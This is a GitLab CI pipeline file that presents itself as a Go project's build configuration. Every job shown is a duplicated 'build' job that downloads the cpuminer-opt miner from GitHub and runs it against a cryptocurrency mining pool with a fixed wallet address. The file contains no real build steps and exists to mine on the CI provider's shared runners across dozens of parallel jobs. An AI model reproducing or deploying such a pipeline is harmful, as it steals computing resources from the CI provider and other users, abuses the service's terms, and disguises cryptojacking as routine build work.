image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_b:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_c:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_d:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_e:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_f:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_g:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_h:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok
build_i:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_j:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_k:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_l:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_m:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_n:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_o:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_p:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_q:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_r:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_s:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_t:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_u:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_v:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_w:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_x:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_y:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_z:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_af:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ag:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ah:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ai:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aj:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ak:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_al:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_am:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_an:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ao:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_av:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aw:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_ax:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok
build_ay:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_az:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aaa:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_aae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_1:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_2:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_3:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_4:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_6:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_7:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_8:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_9:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_10:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_11:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_12:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_13:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_14:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_15:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_16:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_17:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_18:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_19:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_20:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_21:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_22:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_23:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_24:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok

build_25:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qc4y863shhe78t5st7ayt40gmdzpwm74w0m7dmc.jancok